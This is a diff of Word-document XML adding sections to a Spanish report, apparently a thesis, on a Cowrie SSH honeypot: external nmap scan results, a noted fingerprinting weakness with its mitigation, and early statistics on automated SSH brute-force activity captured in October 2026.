+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:b w:val="false"/>
+                <w:bCs w:val="false"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">OpenSSH 9.6p1 Ubuntu 3ubuntu13.19 (SSH real)</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="pct" w:w="1000"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:b w:val="false"/>
+                <w:bCs w:val="false"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">Resto (2998)</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="pct" w:w="1500"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:b w:val="false"/>
+                <w:bCs w:val="false"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">Filtrado, sin respuesta</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="pct" w:w="2500"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:b w:val="false"/>
+                <w:bCs w:val="false"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">—</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+    </w:tbl>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="240" w:before="60" w:line="360"/>
+        <w:jc w:val="center"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:b/>
+          <w:bCs/>
+          <w:i w:val="false"/>
+          <w:iCs w:val="false"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Tabla 11. Resultado del escaneo externo con nmap.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360"/>
+        <w:ind w:firstLine="709"/>
+        <w:jc w:val="left"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:i w:val="false"/>
+          <w:iCs w:val="false"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">El resultado confirma tres aspectos. Solo los dos puertos previstos son visibles. Cowrie supera la detección de versiones de nmap, que lo identifica como el OpenSSH de un Debian 12, la identidad configurada. Y el motivo «no-response» de los puertos filtrados demuestra que el Cloud Firewall de Hetzner está aplicado: si solo actuase el iptables del servidor, la regla REJECT devolvería un mensaje ICMP y nmap mostraría otro motivo.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360"/>
+        <w:ind w:firstLine="709"/>
+        <w:jc w:val="left"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:i w:val="false"/>
+          <w:iCs w:val="false"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">El escaneo revela también una debilidad: el puerto 2022 se identifica como Ubuntu y el 22 como Debian, de modo que un atacante que compare ambos puede deducir que en la misma IP conviven dos sistemas distintos y sospechar del honeypot. La mitigación propuesta es restringir en el Cloud Firewall el puerto 2022 a la IP del administrador.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
         <w:pStyle w:val="Heading2"/>
         <w:keepNext/>
         <w:spacing w:after="240" w:before="240" w:line="360"/>
@@ -23645,7 +24036,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">Las siguientes pruebas de la tabla RFTP se documentarán, con sus capturas, a medida que avance el proyecto:</w:t>
+        <w:t xml:space="preserve">Queda pendiente la siguiente prueba de la tabla RFTP, que se documentará con sus capturas:</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -23664,7 +24055,2987 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">Escaneo con nmap desde el exterior: solo los puertos 22 y 2022 visibles (R01F02T01P01).</w:t>
+        <w:t xml:space="preserve">Ataque controlado desde Kali Linux con hydra y verificación en cowrie.json (CU-03).</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading1"/>
+        <w:keepNext/>
+        <w:pageBreakBefore/>
+        <w:spacing w:after="240" w:before="240" w:line="360"/>
+        <w:jc w:val="center"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Resultados</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360"/>
+        <w:ind w:firstLine="709"/>
+        <w:jc w:val="left"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:i w:val="false"/>
+          <w:iCs w:val="false"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Este capítulo presenta los resultados de los primeros días de captura, del 4 de octubre de 2026 a las 15:49 UTC (primera conexión hostil, 8 minutos después de exponer el puerto 22) al 7 de octubre a las 16:45 UTC. Son resultados parciales: la captura continúa hasta finales de octubre y el informe de inteligencia final se elaborará con el periodo completo. Las cifras se han obtenido con cowrie_analyzer.py excluyendo las sesiones de prueba del administrador.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading2"/>
+        <w:keepNext/>
+        <w:spacing w:after="240" w:before="240" w:line="360"/>
+        <w:jc w:val="left"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Volumen de la Actividad</w:t>
+      </w:r>
+    </w:p>
+    <w:tbl>
+      <w:tblPr>
+        <w:tblW w:type="pct" w:w="5000"/>
+        <w:tblBorders>
+          <w:top w:val="single" w:color="auto" w:sz="4"/>
+          <w:left w:val="single" w:color="auto" w:sz="4"/>
+          <w:bottom w:val="single" w:color="auto" w:sz="4"/>
+          <w:right w:val="single" w:color="auto" w:sz="4"/>
+          <w:insideH w:val="single" w:color="auto" w:sz="4"/>
+          <w:insideV w:val="single" w:color="auto" w:sz="4"/>
+        </w:tblBorders>
+      </w:tblPr>
+      <w:tblGrid>
+        <w:gridCol w:w="4366"/>
+        <w:gridCol w:w="3572"/>
+      </w:tblGrid>
+      <w:tr>
+        <w:trPr>
+          <w:tblHeader/>
+        </w:trPr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="pct" w:w="2750"/>
+            <w:shd w:fill="D9E2F3" w:color="D9E2F3" w:val="solid"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:b/>
+                <w:bCs/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">Indicador</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="pct" w:w="2250"/>
+            <w:shd w:fill="D9E2F3" w:color="D9E2F3" w:val="solid"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:b/>
+                <w:bCs/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">Valor</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="pct" w:w="2750"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:b w:val="false"/>
+                <w:bCs w:val="false"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">Conexiones (sesiones)</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="pct" w:w="2250"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:b w:val="false"/>
+                <w:bCs w:val="false"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">13 761</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="pct" w:w="2750"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:b w:val="false"/>
+                <w:bCs w:val="false"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">IPs de origen distintas</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="pct" w:w="2250"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:b w:val="false"/>
+                <w:bCs w:val="false"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">499</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="pct" w:w="2750"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:b w:val="false"/>
+                <w:bCs w:val="false"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">Intentos de autenticación</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="pct" w:w="2250"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:b w:val="false"/>
+                <w:bCs w:val="false"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">12 748 (10 688 fallidos y 2 060 aceptados)</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="pct" w:w="2750"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:b w:val="false"/>
+                <w:bCs w:val="false"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">Comandos ejecutados</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="pct" w:w="2250"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:b w:val="false"/>
+                <w:bCs w:val="false"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">2 657</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="pct" w:w="2750"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:b w:val="false"/>
+                <w:bCs w:val="false"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">Ficheros capturados</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="pct" w:w="2250"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:b w:val="false"/>
+                <w:bCs w:val="false"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">654 eventos de 17 ficheros distintos</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="pct" w:w="2750"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:b w:val="false"/>
+                <w:bCs w:val="false"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">Técnicas MITRE ATT&amp;CK identificadas</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="pct" w:w="2250"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:b w:val="false"/>
+                <w:bCs w:val="false"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">21, en 9 tácticas</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+    </w:tbl>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="240" w:before="60" w:line="360"/>
+        <w:jc w:val="center"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:b/>
+          <w:bCs/>
+          <w:i w:val="false"/>
+          <w:iCs w:val="false"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Tabla 12. Resumen de la actividad capturada (4–7 de octubre de 2026).</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360"/>
+        <w:ind w:firstLine="709"/>
+        <w:jc w:val="left"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:i w:val="false"/>
+          <w:iCs w:val="false"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">El primer acceso con éxito se produjo a los 26 minutos de la exposición. La media es de unas 3 400 conexiones diarias, repartidas a todas las horas del día. La Figura 5 muestra la actividad por día; el primero y el último son parciales.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:keepNext/>
+        <w:spacing w:before="240" w:line="360"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Figura 5</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:keepNext/>
+        <w:spacing w:line="360"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:i/>
+          <w:iCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Conexiones diarias registradas por el honeypot</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="120" w:line="240" w:lineRule="auto"/>
+        <w:jc w:val="center"/>
+      </w:pPr>
+      <w:r>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0">
+            <wp:extent cx="5038725" cy="1647825"/>
+            <wp:effectExtent t="0" r="0" b="0" l="0"/>
+            <wp:docPr id="7" name="" descr="" title=""/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="0" name="" descr=""/>
+                    <pic:cNvPicPr>
+                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
+                    </pic:cNvPicPr>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId15" cstate="none"/>
+                    <a:srcRect/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr bwMode="auto">
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5038725" cy="1647825"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading2"/>
+        <w:keepNext/>
+        <w:spacing w:after="240" w:before="240" w:line="360"/>
+        <w:jc w:val="left"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Naturaleza Automatizada de los Ataques</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360"/>
+        <w:ind w:firstLine="709"/>
+        <w:jc w:val="left"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:i w:val="false"/>
+          <w:iCs w:val="false"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Todos los indicadores apuntan a herramientas automatizadas y no a operadores humanos. En las sesiones con comandos, la mediana entre la autenticación y el primer comando es de 0,7 segundos, y la mitad de todas las sesiones dura menos de 1,4 segundos. El 85,2 % de las conexiones se identifican con el cliente SSH-2.0-Go, una biblioteca de programación y no un cliente interactivo; le siguen libssh (12,8 %) y, de forma testimonial, PuTTY (0,8 %). La Tabla 13 clasifica las sesiones según lo que llegó a hacer el atacante.</w:t>
+      </w:r>
+    </w:p>
+    <w:tbl>
+      <w:tblPr>
+        <w:tblW w:type="pct" w:w="5000"/>
+        <w:tblBorders>
+          <w:top w:val="single" w:color="auto" w:sz="4"/>
+          <w:left w:val="single" w:color="auto" w:sz="4"/>
+          <w:bottom w:val="single" w:color="auto" w:sz="4"/>
+          <w:right w:val="single" w:color="auto" w:sz="4"/>
+          <w:insideH w:val="single" w:color="auto" w:sz="4"/>
+          <w:insideV w:val="single" w:color="auto" w:sz="4"/>
+        </w:tblBorders>
+      </w:tblPr>
+      <w:tblGrid>
+        <w:gridCol w:w="4763"/>
+        <w:gridCol w:w="1588"/>
+        <w:gridCol w:w="1588"/>
+      </w:tblGrid>
+      <w:tr>
+        <w:trPr>
+          <w:tblHeader/>
+        </w:trPr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="pct" w:w="3000"/>
+            <w:shd w:fill="D9E2F3" w:color="D9E2F3" w:val="solid"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:b/>
+                <w:bCs/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">Comportamiento</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="pct" w:w="1000"/>
+            <w:shd w:fill="D9E2F3" w:color="D9E2F3" w:val="solid"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:b/>
+                <w:bCs/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">Sesiones</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="pct" w:w="1000"/>
+            <w:shd w:fill="D9E2F3" w:color="D9E2F3" w:val="solid"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:b/>
+                <w:bCs/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">%</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="pct" w:w="3000"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:b w:val="false"/>
+                <w:bCs w:val="false"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">Prueba credenciales y no consigue entrar</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="pct" w:w="1000"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:b w:val="false"/>
+                <w:bCs w:val="false"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">10 509</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="pct" w:w="1000"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:b w:val="false"/>
+                <w:bCs w:val="false"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">76,4</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="pct" w:w="3000"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:b w:val="false"/>
+                <w:bCs w:val="false"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">Se conecta sin intentar autenticarse (escaneo)</w:t>
+            </w:r>
+          </w:p>
